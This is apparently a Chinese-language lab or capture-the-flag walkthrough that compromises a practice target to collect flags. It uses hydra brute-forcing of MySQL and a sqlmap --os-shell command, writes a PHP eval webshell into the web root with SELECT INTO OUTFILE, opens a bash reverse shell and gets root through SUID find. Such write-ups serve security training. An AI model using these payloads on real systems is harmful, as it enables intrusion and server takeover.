目录
一、扫描存活主机
使用arp-scan -l扫描靶机IP为192.168.96.137
二、端口扫描
Nmap扫描开放端口
三、目录扫描
使用dirsearch扫描目录,存在phpinfo信息泄露以及数据库压缩包文件
把压缩包下载后打开,里面是数据库相关信息,存在账户信息admin/123456
四、key6
访问80端口,是一个登录框,用前面的admin/123456登录却显示密码错误,尝试了万能密码也无果
回想到前面端口扫描开放了3306,用hydra爆破试试,爆破出数据库密码为123456
连接数据库成功,查询数据库中所有库名
在数据库patient中的mg_user表找到后台登录账号信息Mayo/huasheng
使用Mayo/huasheng登录后台成功,进来直接显示key6
五、getshell
在档案管理处存在文件上传功能,但上传之后没有回显,无法利用
那只能继续从数据库下手,看看能不能—os-shell,--os-shell需要满足以下条件:
- 高权限用户
- 知道绝对路径
- secure_file_priv为空
- 有写入权限
(1)通过select user(),查询出是root高权限用户
(2)网站绝对路径通过目录扫描出的phpinfo界面可以得到:
/var/www/html/PIzABXDg/
(3)show global variables like "%secure%"查询到secure_file_priv为空
(4)有无写入权限这个不知道如何判定,只能先试试—os-shell了
先通过sqlmap连接MySQL,使用-d参数:
sqlmap.py -d “mysql://用户名:密码@IP:端口/数据库名” –os-shell
输入命令:sqlmap -d "mysql://root:123456@192.168.96.137:3306/patient" --os-shell
选择36位还是64位,如果不知道就都选一遍。继续后有报错,显示文件没有被写入,在目标路径没有写的权限:
再继续会询问没有连接,是否要继续?我这选了是继续看看。虽然会显示os-shell交互命令行,但是执行不了命令,因为没有写入文件成功
既然—os-shell走不通,再换个思路,能不能直接写一句话木马到网站目录中呢,因为我们知道网站的绝对路径。通过mysql写入一句话木马显示成功:
select '<?php eval($_REQUEST[123]); ?>' into outfile 'var/www/html/PIzABXDg/shell.php';
使用蚁剑连接成功
六、key7
连接成功后进入网站根目录显示key7
七、反弹shell
查看当前用户权限是低权限用户,先反弹shell
本地开启监听端口
使用nc反弹,发现没有-e选项,不得行
换用bash -i反弹成功
使用python转化成交互式shell
八、提权
Uname -a查看系统信息为2.6.32,可以尝试用脏牛提权,但没有gcc环境无法编译遂放弃
使用sudo -l查看特权命令,但不知道apache密码遂放弃
尝试Suid提权,查找具有suid权限的文件,发现有find命令可以用来提权
使用find命令提权:find / -exec "/bin/bash" -p \; 成功提权至root用户
九、key8
进入root目录获得key8